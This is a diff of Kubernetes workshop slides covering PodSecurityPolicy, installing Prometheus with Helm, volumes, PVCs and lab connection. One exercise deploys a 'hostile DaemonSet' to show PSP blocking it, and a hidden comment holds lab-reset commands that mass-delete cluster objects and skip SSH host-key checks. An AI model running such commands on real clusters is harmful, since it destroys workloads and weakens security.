- Let's create the same DaemonSet we used earlier
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a hostile DaemonSet:
|
||||
```bash
|
||||
kubectl create -f ~/container.training/k8s/hacktheplanet.yaml
|
||||
```
|
||||
|
||||
- Look at the state of the namespace:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## What's in our restricted policy?
|
||||
|
||||
- The restricted PSP is similar to the one provided in the docs, but:
|
||||
|
||||
- it allows containers to run as root
|
||||
|
||||
- it doesn't drop capabilities
|
||||
|
||||
- Many containers run as root by default, and would require additional tweaks
|
||||
|
||||
- Many containers use e.g. `chown`, which requires a specific capability
|
||||
|
||||
(that's the case for the NGINX official image, for instance)
|
||||
|
||||
- We still block: hostPath, privileged containers, and much more!
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## The case of static pods
|
||||
|
||||
- If we list the pods in the `kube-system` namespace, `kube-apiserver` is missing
|
||||
|
||||
- However, the API server is obviously running
|
||||
|
||||
(otherwise, `kubectl get pods --namespace=kube-system` wouldn't work)
|
||||
|
||||
- The API server Pod is created directly by kubelet
|
||||
|
||||
(without going through the PSP admission plugin)
|
||||
|
||||
- Then, kubelet creates a "mirror pod" representing that Pod in etcd
|
||||
|
||||
- That "mirror pod" creation goes through the PSP admission plugin
|
||||
|
||||
- And it gets blocked!
|
||||
|
||||
- This can be fixed by binding `psp:privileged` to group `system:nodes`
|
||||
|
||||
---
|
||||
|
||||
## .warning[Before moving on...]
|
||||
|
||||
- Our cluster is currently broken
|
||||
|
||||
(we can't create pods in kube-system, default, ...)
|
||||
|
||||
- We need to either:
|
||||
|
||||
- disable the PSP admission plugin
|
||||
|
||||
- allow use of PSP to relevant users and groups
|
||||
|
||||
- For instance, we could:
|
||||
|
||||
- bind `psp:restricted` to the group `system:authenticated`
|
||||
|
||||
- bind `psp:privileged` to the ServiceAccount `kube-system:default`
|
||||
@@ -12,7 +12,7 @@
|
||||
|
||||
- an *alert manager* to notify us according to metrics values or trends
|
||||
|
||||
- We are going to deploy it on our Kubernetes cluster and see how to query it
|
||||
- We are going to use it to collect and query some metrics on our Kubernetes cluster
|
||||
|
||||
---
|
||||
|
||||
@@ -145,7 +145,28 @@ scrape_configs:
|
||||
|
||||
(it will even be gentler on the I/O subsystem since it needs to write less)
|
||||
|
||||
[Storage in Prometheus 2.0](https://www.youtube.com/watch?v=C4YV-9CrawA) by [Goutham V](https://twitter.com/putadent) at DC17EU
|
||||
- Would you like to know more? Check this video:
|
||||
|
||||
[Storage in Prometheus 2.0](https://www.youtube.com/watch?v=C4YV-9CrawA) by [Goutham V](https://twitter.com/putadent) at DC17EU
|
||||
|
||||
---
|
||||
|
||||
## Checking if Prometheus is installed
|
||||
|
||||
- Before trying to install Prometheus, let's check if it's already there
|
||||
|
||||
.exercise[
|
||||
|
||||
- Look for services with a label `app=prometheus` across all namespaces:
|
||||
```bash
|
||||
kubectl get services --selector=app=prometheus --all-namespaces
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
If we see a `NodePort` service called `prometheus-server`, we're good!
|
||||
|
||||
(We can then skip to "Connecting to the Prometheus web UI".)
|
||||
|
||||
---
|
||||
|
||||
@@ -169,11 +190,11 @@ We need to:
|
||||
|
||||
---
|
||||
|
||||
## Helm Charts to the rescue
|
||||
## Helm charts to the rescue
|
||||
|
||||
- To make our lives easier, we are going to use a Helm Chart
|
||||
- To make our lives easier, we are going to use a Helm chart
|
||||
|
||||
- The Helm Chart will take care of all the steps explained above
|
||||
- The Helm chart will take care of all the steps explained above
|
||||
|
||||
(including some extra features that we don't need, but won't hurt)
|
||||
|
||||
@@ -210,20 +231,41 @@ We need to:
|
||||
|
||||
- Install Prometheus on our cluster:
|
||||
```bash
|
||||
helm install stable/prometheus \
|
||||
--set server.service.type=NodePort \
|
||||
--set server.persistentVolume.enabled=false
|
||||
helm upgrade prometheus stable/prometheus \
|
||||
--install \
|
||||
--namespace kube-system \
|
||||
--set server.service.type=NodePort \
|
||||
--set server.service.nodePort=30090 \
|
||||
--set server.persistentVolume.enabled=false \
|
||||
--set alertmanager.enabled=false
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The provided flags:
|
||||
Curious about all these flags? They're explained in the next slide.
|
||||
|
||||
- expose the server web UI (and API) on a NodePort
|
||||
---
|
||||
|
||||
- use an ephemeral volume for metrics storage
|
||||
<br/>
|
||||
(instead of requesting a Persistent Volume through a Persistent Volume Claim)
|
||||
class: extra-details
|
||||
|
||||
## Explaining all the Helm flags
|
||||
|
||||
- `helm upgrade prometheus` → upgrade release "prometheus" to the latest version ...
|
||||
|
||||
(a "release" is a unique name given to an app deployed with Helm)
|
||||
|
||||
- `stable/prometheus` → ... of the chart `prometheus` in repo `stable`
|
||||
|
||||
- `--install` → if the app doesn't exist, create it
|
||||
|
||||
- `--namespace kube-system` → put it in that specific namespace
|
||||
|
||||
- And set the following *values* when rendering the chart's templates:
|
||||
|
||||
- `server.service.type=NodePort` → expose the Prometheus server with a NodePort
|
||||
- `server.service.nodePort=30090` → set the specific NodePort number to use
|
||||
- `server.persistentVolume.enabled=false` → do not use a PersistentVolumeClaim
|
||||
- `alertmanager.enabled=false` → disable the alert manager entirely
|
||||
|
||||
---
|
||||
|
||||
@@ -235,7 +277,7 @@ The provided flags:
|
||||
|
||||
- Figure out the NodePort that was allocated to the Prometheus server:
|
||||
```bash
|
||||
kubectl get svc | grep prometheus-server
|
||||
kubectl get svc --all-namespaces | grep prometheus-server
|
||||
```
|
||||
|
||||
- With your browser, connect to that port
|
||||
@@ -292,7 +334,7 @@ This query will show us CPU usage across all containers:
|
||||
container_cpu_usage_seconds_total
|
||||
```
|
||||
|
||||
- The suffix of the metrics name tells us:
|
||||
- The suffix of the metrics name tells us:
|
||||
|
||||
- the unit (seconds of CPU)
|
||||
|
||||
@@ -486,3 +528,21 @@ class: extra-details
|
||||
- see [this comment](https://github.com/prometheus/prometheus/issues/2204#issuecomment-261515520) for an overview
|
||||
|
||||
- or [this blog post](https://5pi.de/2017/11/09/use-prometheus-vector-matching-to-get-kubernetes-utilization-across-any-pod-label/) for a complete description of the process
|
||||
|
||||
---
|
||||
|
||||
## In practice
|
||||
|
||||
- Grafana is a beautiful (and useful) frontend to display all kinds of graphs
|
||||
|
||||
- Not everyone needs to know Prometheus, PromQL, Grafana, etc.
|
||||
|
||||
- But in a team, it is valuable to have at least one person who know them
|
||||
|
||||
- That person can set up queries and dashboards for the rest of the team
|
||||
|
||||
- It's a little bit likeknowing how to optimize SQL queries, Dockerfiles ...
|
||||
|
||||
Don't panic if you don't know these tools!
|
||||
|
||||
... But make sure at least one person in your team is on it 💯
|
||||
|
||||
@@ -34,13 +34,13 @@
|
||||
|
||||
- Each pod can discover the IP address of the others easily
|
||||
|
||||
- The pods can have persistent volumes attached to them
|
||||
- The pods can persist data on attached volumes
|
||||
|
||||
🤔 Wait a minute ... Can't we already attach volumes to pods and deployments?
|
||||
|
||||
---
|
||||
|
||||
## Volumes and Persistent Volumes
|
||||
## Revisiting volumes
|
||||
|
||||
- [Volumes](https://kubernetes.io/docs/concepts/storage/volumes/) are used for many purposes:
|
||||
|
||||
@@ -50,13 +50,13 @@
|
||||
|
||||
- accessing storage systems
|
||||
|
||||
- The last type of volumes is known as a "Persistent Volume"
|
||||
- Let's see examples of the latter usage
|
||||
|
||||
---
|
||||
|
||||
## Persistent Volumes types
|
||||
## Volumes types
|
||||
|
||||
- There are many [types of Persistent Volumes](https://kubernetes.io/docs/concepts/storage/persistent-volumes/#types-of-persistent-volumes) available:
|
||||
- There are many [types of volumes](https://kubernetes.io/docs/concepts/storage/volumes/#types-of-volumes) available:
|
||||
|
||||
- public cloud storage (GCEPersistentDisk, AWSElasticBlockStore, AzureDisk...)
|
||||
|
||||
@@ -74,7 +74,7 @@
|
||||
|
||||
---
|
||||
|
||||
## Using a Persistent Volume
|
||||
## Using a cloud volume
|
||||
|
||||
Here is a pod definition using an AWS EBS volume (that has to be created first):
|
||||
|
||||
@@ -99,7 +99,32 @@ spec:
|
||||
|
||||
---
|
||||
|
||||
## Shortcomings of Persistent Volumes
|
||||
## Using an NFS volume
|
||||
|
||||
Here is another example using a volume on an NFS server:
|
||||
|
||||
```yaml
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: pod-using-my-nfs-volume
|
||||
spec:
|
||||
containers:
|
||||
- image: ...
|
||||
name: container-using-my-nfs-volume
|
||||
volumeMounts:
|
||||
- mountPath: /my-nfs
|
||||
name: my-nfs-volume
|
||||
volumes:
|
||||
- name: my-nfs-volume
|
||||
nfs:
|
||||
server: 192.168.0.55
|
||||
path: "/exports/assets"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Shortcomings of volumes
|
||||
|
||||
- Their lifecycle (creation, deletion...) is managed outside of the Kubernetes API
|
||||
|
||||
@@ -125,17 +150,47 @@ spec:
|
||||
|
||||
- This type is a *Persistent Volume Claim*
|
||||
|
||||
- A Persistent Volume Claim (PVC) is a resource type
|
||||
|
||||
(visible with `kubectl get persistentvolumeclaims` or `kubectl get pvc`)
|
||||
|
||||
- A PVC is not a volume; it is a *request for a volume*
|
||||
|
||||
---
|
||||
|
||||
## Persistent Volume Claims in practice
|
||||
|
||||
- Using a Persistent Volume Claim is a two-step process:
|
||||
|
||||
- creating the claim
|
||||
|
||||
- using the claim in a pod (as if it were any other kind of volume)
|
||||
|
||||
- Between these two steps, something will happen behind the scenes:
|
||||
- A PVC starts by being Unbound (without an associated volume)
|
||||
|
||||
- Kubernetes will associate an existing volume with the claim
|
||||
- Once it is associated with a Persistent Volume, it becomes Bound
|
||||
|
||||
- ... or dynamically create a volume if possible and necessary
|
||||
- A Pod referring an unbound PVC will not start
|
||||
|
||||
(but as soon as the PVC is bound, the Pod can start)
|
||||
|
||||
---
|
||||
|
||||
## Binding PV and PVC
|
||||
|
||||
- A Kubernetes controller continuously watches PV and PVC objects
|
||||
|
||||
- When it notices an unbound PVC, it tries to find a satisfactory PV
|
||||
|
||||
("satisfactory" in terms of size and other characteristics; see next slide)
|
||||
|
||||
- If no PV fits the PVC, a PV can be created dynamically
|
||||
|
||||
(this requires to configure a *dynamic provisioner*, more on that later)
|
||||
|
||||
- Otherwise, the PVC remains unbound indefinitely
|
||||
|
||||
(until we manually create a PV or setup dynamic provisioning)
|
||||
|
||||
---
|
||||
|
||||
@@ -147,7 +202,9 @@ spec:
|
||||
|
||||
- the access mode (e.g. "read-write by a single pod")
|
||||
|
||||
- It can also give extra details, like:
|
||||
- Optionally, it can also specify a Storage Class
|
||||
|
||||
- The Storage Class indicates:
|
||||
|
||||
- which storage system to use (e.g. Portworx, EBS...)
|
||||
|
||||
@@ -155,8 +212,6 @@ spec:
|
||||
|
||||
e.g.: "replicate the data 3 times, and use SSD media"
|
||||
|
||||
- The extra details are provided by specifying a Storage Class
|
||||
|
||||
---
|
||||
|
||||
## What's a Storage Class?
|
||||
@@ -167,15 +222,15 @@ spec:
|
||||
|
||||
- It indicates which *provisioner* to use
|
||||
|
||||
(which controller will create the actual volume)
|
||||
|
||||
- And arbitrary parameters for that provisioner
|
||||
|
||||
(replication levels, type of disk ... anything relevant!)
|
||||
|
||||
- It is necessary to define a Storage Class to use [dynamic provisioning](https://kubernetes.io/docs/concepts/storage/dynamic-provisioning/)
|
||||
- Storage Classes are required if we want to use [dynamic provisioning](https://kubernetes.io/docs/concepts/storage/dynamic-provisioning/)
|
||||
|
||||
- Conversely, it is not necessary to define one if you will create volumes manually
|
||||
|
||||
(we will see dynamic provisioning in action later)
|
||||
(but we can also create volumes manually, and ignore Storage Classes)
|
||||
|
||||
---
|
||||
|
||||
@@ -200,7 +255,7 @@ spec:
|
||||
|
||||
## Using a Persistent Volume Claim
|
||||
|
||||
Here is the same definition as earlier, but using a PVC:
|
||||
Here is a Pod definition like the ones shown earlier, but using a PVC:
|
||||
|
||||
```yaml
|
||||
apiVersion: v1
|
||||
@@ -212,7 +267,7 @@ spec:
|
||||
- image: ...
|
||||
name: container-using-a-claim
|
||||
volumeMounts:
|
||||
- mountPath: /my-ebs
|
||||
- mountPath: /my-vol
|
||||
name: my-volume
|
||||
volumes:
|
||||
- name: my-volume
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
## Versions installed
|
||||
|
||||
- Kubernetes 1.14.1
|
||||
- Docker Engine 18.09.5
|
||||
- Kubernetes 1.14.2
|
||||
- Docker Engine 18.09.6
|
||||
- Docker Compose 1.21.1
|
||||
|
||||
<!-- ##VERSION## -->
|
||||
|
||||
@@ -18,6 +18,8 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Kubernetes volumes vs. Docker volumes
|
||||
|
||||
- Kubernetes and Docker volumes are very similar
|
||||
@@ -35,13 +37,35 @@
|
||||
- Kubernetes volumes are also used to expose configuration and secrets
|
||||
|
||||
- Docker has specific concepts for configuration and secrets
|
||||
|
||||
<br/>
|
||||
(but under the hood, the technical implementation is similar)
|
||||
|
||||
- If you're not familiar with Docker volumes, you can safely ignore this slide!
|
||||
|
||||
---
|
||||
|
||||
## Volumes ≠ Persistent Volumes
|
||||
|
||||
- Volumes and Persistent Volumes are related, but very different!
|
||||
|
||||
- *Volumes*:
|
||||
|
||||
- appear in Pod specifications (see next slide)
|
||||
|
||||
- do not exist as API resources (**cannot** do `kubectl get volumes`)
|
||||
|
||||
- *Persistent Volumes*:
|
||||
|
||||
- are API resources (**can** do `kubectl get persistentvolumes`)
|
||||
|
||||
- correspond to concrete volumes (e.g. on a SAN, EBS, etc.)
|
||||
|
||||
- cannot be associated to a Pod directly; but through a Persistent Volume Claim
|
||||
|
||||
- won't be discussed further in this section
|
||||
|
||||
---
|
||||
|
||||
## A simple volume example
|
||||
|
||||
```yaml
|
||||
|
||||
@@ -132,6 +132,8 @@ And *then* it is time to look at orchestration!
|
||||
|
|
||||
[Persistent Volumes](kube-selfpaced.yml.html#toc-highly-available-persistent-volumes)
|
||||
|
||||
- Excellent [blog post](http://www.databasesoup.com/2018/07/should-i-run-postgres-on-kubernetes.html) tackling the question: “Should I run Postgres on Kubernetes?”
|
||||
|
||||
---
|
||||
|
||||
## HTTP traffic handling
|
||||
|
||||
@@ -20,54 +20,58 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- k8s/versions-k8s.md
|
||||
- shared/sampleapp.md
|
||||
# - shared/composescale.md
|
||||
# - shared/hastyconclusions.md
|
||||
#- shared/composescale.md
|
||||
#- shared/hastyconclusions.md
|
||||
- shared/composedown.md
|
||||
- k8s/concepts-k8s.md
|
||||
- shared/declarative.md
|
||||
- k8s/declarative.md
|
||||
- - k8s/kubenet.md
|
||||
- k8s/kubectlget.md
|
||||
- k8s/kubenet.md
|
||||
- - k8s/kubectlget.md
|
||||
- k8s/setup-k8s.md
|
||||
- k8s/kubectlrun.md
|
||||
- k8s/deploymentslideshow.md
|
||||
- k8s/kubectlexpose.md
|
||||
- - k8s/shippingimages.md
|
||||
# - k8s/buildshiprun-selfhosted.md
|
||||
#- k8s/buildshiprun-selfhosted.md
|
||||
- k8s/buildshiprun-dockerhub.md
|
||||
- k8s/ourapponkube.md
|
||||
# - k8s/kubectlproxy.md
|
||||
# - k8s/localkubeconfig.md
|
||||
# - k8s/accessinternal.md
|
||||
#- k8s/kubectlproxy.md
|
||||
#- k8s/localkubeconfig.md
|
||||
#- k8s/accessinternal.md
|
||||
- k8s/dashboard.md
|
||||
# - k8s/kubectlscale.md
|
||||
#- k8s/kubectlscale.md
|
||||
- k8s/scalingdockercoins.md
|
||||
- shared/hastyconclusions.md
|
||||
- k8s/daemonset.md
|
||||
- - k8s/rollout.md
|
||||
# - k8s/healthchecks.md
|
||||
- k8s/namespaces.md
|
||||
#- k8s/kustomize.md
|
||||
#- k8s/helm.md
|
||||
#- k8s/create-chart.md
|
||||
#- k8s/healthchecks.md
|
||||
- k8s/logs-cli.md
|
||||
- k8s/logs-centralized.md
|
||||
#- - k8s/helm.md
|
||||
# - k8s/create-chart.md
|
||||
# - k8s/kustomize.md
|
||||
# - k8s/namespaces.md
|
||||
# - k8s/netpol.md
|
||||
# - k8s/authn-authz.md
|
||||
# - k8s/csr-api.md
|
||||
#- - k8s/ingress.md
|
||||
# - k8s/gitworkflows.md
|
||||
#- k8s/netpol.md
|
||||
#- k8s/authn-authz.md
|
||||
#- k8s/csr-api.md
|
||||
#- k8s/podsecuritypolicy.md
|
||||
#- k8s/ingress.md
|
||||
#- k8s/gitworkflows.md
|
||||
- k8s/prometheus.md
|
||||
#- - k8s/volumes.md
|
||||
# - k8s/build-with-docker.md
|
||||
# - k8s/build-with-kaniko.md
|
||||
# - k8s/configuration.md
|
||||
#- - k8s/owners-and-dependents.md
|
||||
# - k8s/extending-api.md
|
||||
# - k8s/statefulsets.md
|
||||
# - k8s/portworx.md
|
||||
#- k8s/volumes.md
|
||||
#- k8s/build-with-docker.md
|
||||
#- k8s/build-with-kaniko.md
|
||||
#- k8s/configuration.md
|
||||
#- k8s/owners-and-dependents.md
|
||||
#- k8s/extending-api.md
|
||||
#- k8s/statefulsets.md
|
||||
#- k8s/local-persistent-volumes.md
|
||||
#- k8s/portworx.md
|
||||
#- k8s/staticpods.md
|
||||
- - k8s/whatsnext.md
|
||||
- k8s/links.md
|
||||
- shared/thankyou.md
|
||||
|
||||
@@ -22,6 +22,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- k8s/versions-k8s.md
|
||||
- shared/sampleapp.md
|
||||
# Bridget doesn't go into as much depth with compose
|
||||
@@ -53,10 +54,10 @@ chapters:
|
||||
- - k8s/logs-cli.md
|
||||
# Bridget hasn't added EFK yet
|
||||
#- k8s/logs-centralized.md
|
||||
- k8s/namespaces.md
|
||||
- k8s/helm.md
|
||||
- k8s/create-chart.md
|
||||
#- k8s/kustomize.md
|
||||
- k8s/namespaces.md
|
||||
#- k8s/netpol.md
|
||||
- k8s/whatsnext.md
|
||||
# - k8s/links.md
|
||||
|
||||
@@ -20,6 +20,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- k8s/versions-k8s.md
|
||||
- shared/sampleapp.md
|
||||
- shared/composescale.md
|
||||
@@ -46,17 +47,18 @@ chapters:
|
||||
# - k8s/scalingdockercoins.md
|
||||
# - shared/hastyconclusions.md
|
||||
- k8s/daemonset.md
|
||||
- - k8s/rollout.md
|
||||
- k8s/rollout.md
|
||||
- - k8s/namespaces.md
|
||||
- k8s/kustomize.md
|
||||
- k8s/helm.md
|
||||
- k8s/create-chart.md
|
||||
- k8s/healthchecks.md
|
||||
- k8s/logs-cli.md
|
||||
- k8s/logs-centralized.md
|
||||
- - k8s/helm.md
|
||||
#- k8s/create-chart.md
|
||||
- k8s/kustomize.md
|
||||
- k8s/namespaces.md
|
||||
- k8s/netpol.md
|
||||
- k8s/authn-authz.md
|
||||
- k8s/csr-api.md
|
||||
- k8s/podsecuritypolicy.md
|
||||
- - k8s/ingress.md
|
||||
- k8s/gitworkflows.md
|
||||
- k8s/prometheus.md
|
||||
@@ -67,6 +69,7 @@ chapters:
|
||||
- - k8s/owners-and-dependents.md
|
||||
- k8s/extending-api.md
|
||||
- k8s/statefulsets.md
|
||||
- k8s/local-persistent-volumes.md
|
||||
- k8s/portworx.md
|
||||
- k8s/staticpods.md
|
||||
- - k8s/whatsnext.md
|
||||
|
||||
@@ -20,6 +20,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- k8s/versions-k8s.md
|
||||
- shared/sampleapp.md
|
||||
#- shared/composescale.md
|
||||
@@ -28,8 +29,8 @@ chapters:
|
||||
- k8s/concepts-k8s.md
|
||||
- shared/declarative.md
|
||||
- k8s/declarative.md
|
||||
- - k8s/kubenet.md
|
||||
- k8s/kubectlget.md
|
||||
- k8s/kubenet.md
|
||||
- - k8s/kubectlget.md
|
||||
- k8s/setup-k8s.md
|
||||
- k8s/kubectlrun.md
|
||||
- k8s/deploymentslideshow.md
|
||||
@@ -47,16 +48,17 @@ chapters:
|
||||
- shared/hastyconclusions.md
|
||||
- - k8s/daemonset.md
|
||||
- k8s/rollout.md
|
||||
- k8s/healthchecks.md
|
||||
- k8s/namespaces.md
|
||||
- k8s/kustomize.md
|
||||
#- k8s/helm.md
|
||||
#- k8s/create-chart.md
|
||||
- - k8s/healthchecks.md
|
||||
- k8s/logs-cli.md
|
||||
- k8s/logs-centralized.md
|
||||
- - k8s/helm.md
|
||||
#- k8s/create-chart.md
|
||||
- k8s/kustomize.md
|
||||
- k8s/namespaces.md
|
||||
- k8s/netpol.md
|
||||
#- k8s/netpol.md
|
||||
- k8s/authn-authz.md
|
||||
- k8s/csr-api.md
|
||||
- k8s/podsecuritypolicy.md
|
||||
- - k8s/ingress.md
|
||||
#- k8s/gitworkflows.md
|
||||
- k8s/prometheus.md
|
||||
@@ -65,10 +67,11 @@ chapters:
|
||||
#- k8s/build-with-kaniko.md
|
||||
- k8s/configuration.md
|
||||
#- k8s/owners-and-dependents.md
|
||||
- k8s/extending-api.md
|
||||
#- k8s/extending-api.md
|
||||
- - k8s/statefulsets.md
|
||||
- k8s/local-persistent-volumes.md
|
||||
- k8s/portworx.md
|
||||
- k8s/staticpods.md
|
||||
#- k8s/staticpods.md
|
||||
- - k8s/whatsnext.md
|
||||
- k8s/links.md
|
||||
- shared/thankyou.md
|
||||
|
||||
137
slides/shared/connecting.md
Normal file
137
slides/shared/connecting.md
Normal file
@@ -0,0 +1,137 @@
|
||||
class: in-person
|
||||
|
||||
## Connecting to our lab environment
|
||||
|
||||
.exercise[
|
||||
|
||||
- Log into the first VM (`node1`) with your SSH client
|
||||
|
||||
<!--
|
||||
```bash
|
||||
for N in $(awk '/\Wnode/{print $2}' /etc/hosts); do
|
||||
ssh -o StrictHostKeyChecking=no $N true
|
||||
done
|
||||
```
|
||||
|
||||
```bash
|
||||
if which kubectl; then
|
||||
kubectl get deploy,ds -o name | xargs -rn1 kubectl delete
|
||||
kubectl get all -o name | grep -v service/kubernetes | xargs -rn1 kubectl delete --ignore-not-found=true
|
||||
kubectl -n kube-system get deploy,svc -o name | grep -v dns | xargs -rn1 kubectl -n kube-system delete
|
||||
fi
|
||||
```
|
||||
-->
|
||||
|
||||
- Check that you can SSH (without password) to `node2`:
|
||||
```bash
|
||||
ssh node2
|
||||
```
|
||||
- Type `exit` or `^D` to come back to `node1`
|
||||
|
||||
<!-- ```bash exit``` -->
|
||||
|
||||
]
|
||||
|
||||
If anything goes wrong — ask for help!
|
||||
|
||||
---
|
||||
|
||||
## Doing or re-doing the workshop on your own?
|
||||
|
||||
- Use something like
|
||||
[Play-With-Docker](http://play-with-docker.com/) or
|
||||
[Play-With-Kubernetes](https://training.play-with-kubernetes.com/)
|
||||
|
||||
Zero setup effort; but environment are short-lived and
|
||||
might have limited resources
|
||||
|
||||
- Create your own cluster (local or cloud VMs)
|
||||
|
||||
Small setup effort; small cost; flexible environments
|
||||
|
||||
- Create a bunch of clusters for you and your friends
|
||||
([instructions](https://@@GITREPO@@/tree/master/prepare-vms))
|
||||
|
||||
Bigger setup effort; ideal for group training
|
||||
|
||||
---
|
||||
|
||||
class: self-paced
|
||||
|
||||
## Get your own Docker nodes
|
||||
|
||||
- If you already have some Docker nodes: great!
|
||||
|
||||
- If not: let's get some thanks to Play-With-Docker
|
||||
|
||||
.exercise[
|
||||
|
||||
- Go to http://www.play-with-docker.com/
|
||||
|
||||
- Log in
|
||||
|
||||
- Create your first node
|
||||
|
||||
<!-- ```open http://www.play-with-docker.com/``` -->
|
||||
|
||||
]
|
||||
|
||||
You will need a Docker ID to use Play-With-Docker.
|
||||
|
||||
(Creating a Docker ID is free.)
|
||||
|
||||
---
|
||||
|
||||
## We will (mostly) interact with node1 only
|
||||
|
||||
*These remarks apply only when using multiple nodes, of course.*
|
||||
|
||||
- Unless instructed, **all commands must be run from the first VM, `node1`**
|
||||
|
||||
- We will only checkout/copy the code on `node1`
|
||||
|
||||
- During normal operations, we do not need access to the other nodes
|
||||
|
||||
- If we had to troubleshoot issues, we would use a combination of:
|
||||
|
||||
- SSH (to access system logs, daemon status...)
|
||||
|
||||
- Docker API (to check running containers and container engine status)
|
||||
|
||||
---
|
||||
|
||||
## Terminals
|
||||
|
||||
Once in a while, the instructions will say:
|
||||
<br/>"Open a new terminal."
|
||||
|
||||
There are multiple ways to do this:
|
||||
|
||||
- create a new window or tab on your machine, and SSH into the VM;
|
||||
|
||||
- use screen or tmux on the VM and open a new window from there.
|
||||
|
||||
You are welcome to use the method that you feel the most comfortable with.
|
||||
|
||||
---
|
||||
|
||||
## Tmux cheatsheet
|
||||
|
||||
[Tmux](https://en.wikipedia.org/wiki/Tmux) is a terminal multiplexer like `screen`.
|
||||
|
||||
*You don't have to use it or even know about it to follow along.
|
||||
<br/>
|
||||
But some of us like to use it to switch between terminals.
|
||||
<br/>
|
||||
It has been preinstalled on your workshop nodes.*
|
||||
|
||||
- Ctrl-b c → creates a new window
|
||||
- Ctrl-b n → go to next window
|
||||
- Ctrl-b p → go to previous window
|
||||
- Ctrl-b " → split window top/bottom
|
||||
- Ctrl-b % → split window left/right
|
||||
- Ctrl-b Alt-1 → rearrange windows in columns
|
||||
- Ctrl-b Alt-2 → rearrange windows in rows
|
||||
- Ctrl-b arrows → navigate to other windows
|
||||
- Ctrl-b d → detach session
|
||||
- tmux attach → reattach to session
|
||||
@@ -169,143 +169,3 @@ class: in-person, extra-details
|
||||
- It requires UDP ports to be open
|
||||
|
||||
(By default, it uses a UDP port between 60000 and 61000)
|
||||
|
||||
---
|
||||
|
||||
class: in-person
|
||||
|
||||
## Connecting to our lab environment
|
||||
|
||||
.exercise[
|
||||
|
||||
- Log into the first VM (`node1`) with your SSH client
|
||||
|
||||
<!--
|
||||
```bash
|
||||
for N in $(awk '/\Wnode/{print $2}' /etc/hosts); do
|
||||
ssh -o StrictHostKeyChecking=no $N true
|
||||
done
|
||||
```
|
||||
|
||||
```bash
|
||||
if which kubectl; then
|
||||
kubectl get deploy,ds -o name | xargs -rn1 kubectl delete
|
||||
kubectl get all -o name | grep -v service/kubernetes | xargs -rn1 kubectl delete --ignore-not-found=true
|
||||
kubectl -n kube-system get deploy,svc -o name | grep -v dns | xargs -rn1 kubectl -n kube-system delete
|
||||
fi
|
||||
```
|
||||
-->
|
||||
|
||||
- Check that you can SSH (without password) to `node2`:
|
||||
```bash
|
||||
ssh node2
|
||||
```
|
||||
- Type `exit` or `^D` to come back to `node1`
|
||||
|
||||
<!-- ```bash exit``` -->
|
||||
|
||||
]
|
||||
|
||||
If anything goes wrong — ask for help!
|
||||
|
||||
---
|
||||
|
||||
## Doing or re-doing the workshop on your own?
|
||||
|
||||
- Use something like
|
||||
[Play-With-Docker](http://play-with-docker.com/) or
|
||||
[Play-With-Kubernetes](https://training.play-with-kubernetes.com/)
|
||||
|
||||
Zero setup effort; but environment are short-lived and
|
||||
might have limited resources
|
||||
|
||||
- Create your own cluster (local or cloud VMs)
|
||||
|
||||
Small setup effort; small cost; flexible environments
|
||||
|
||||
- Create a bunch of clusters for you and your friends
|
||||
([instructions](https://@@GITREPO@@/tree/master/prepare-vms))
|
||||
|
||||
Bigger setup effort; ideal for group training
|
||||
|
||||
---
|
||||
|
||||
class: self-paced
|
||||
|
||||
## Get your own Docker nodes
|
||||
|
||||
- If you already have some Docker nodes: great!
|
||||
|
||||
- If not: let's get some thanks to Play-With-Docker
|
||||
|
||||
.exercise[
|
||||
|
||||
- Go to http://www.play-with-docker.com/
|
||||
|
||||
- Log in
|
||||
|
||||
- Create your first node
|
||||
|
||||
<!-- ```open http://www.play-with-docker.com/``` -->
|
||||
|
||||
]
|
||||
|
||||
You will need a Docker ID to use Play-With-Docker.
|
||||
|
||||
(Creating a Docker ID is free.)
|
||||
|
||||
---
|
||||
|
||||
## We will (mostly) interact with node1 only
|
||||
|
||||
*These remarks apply only when using multiple nodes, of course.*
|
||||
|
||||
- Unless instructed, **all commands must be run from the first VM, `node1`**
|
||||
|
||||
- We will only checkout/copy the code on `node1`
|
||||
|
||||
- During normal operations, we do not need access to the other nodes
|
||||
|
||||
- If we had to troubleshoot issues, we would use a combination of:
|
||||
|
||||
- SSH (to access system logs, daemon status...)
|
||||
|
||||
- Docker API (to check running containers and container engine status)
|
||||
|
||||
---
|
||||
|
||||
## Terminals
|
||||
|
||||
Once in a while, the instructions will say:
|
||||
<br/>"Open a new terminal."
|
||||
|
||||
There are multiple ways to do this:
|
||||
|
||||
- create a new window or tab on your machine, and SSH into the VM;
|
||||
|
||||
- use screen or tmux on the VM and open a new window from there.
|
||||
|
||||
You are welcome to use the method that you feel the most comfortable with.
|
||||
|
||||
---
|
||||
|
||||
## Tmux cheatsheet
|
||||
|
||||
[Tmux](https://en.wikipedia.org/wiki/Tmux) is a terminal multiplexer like `screen`.
|
||||
|
||||
*You don't have to use it or even know about it to follow along.
|
||||
<br/>
|
||||
But some of us like to use it to switch between terminals.
|
||||
<br/>
|
||||
It has been preinstalled on your workshop nodes.*
|
||||
|
||||
- Ctrl-b c → creates a new window
|
||||
- Ctrl-b n → go to next window
|
||||
- Ctrl-b p → go to previous window
|
||||
- Ctrl-b " → split window top/bottom
|
||||
- Ctrl-b % → split window left/right
|
||||
- Ctrl-b Alt-1 → rearrange windows in columns
|
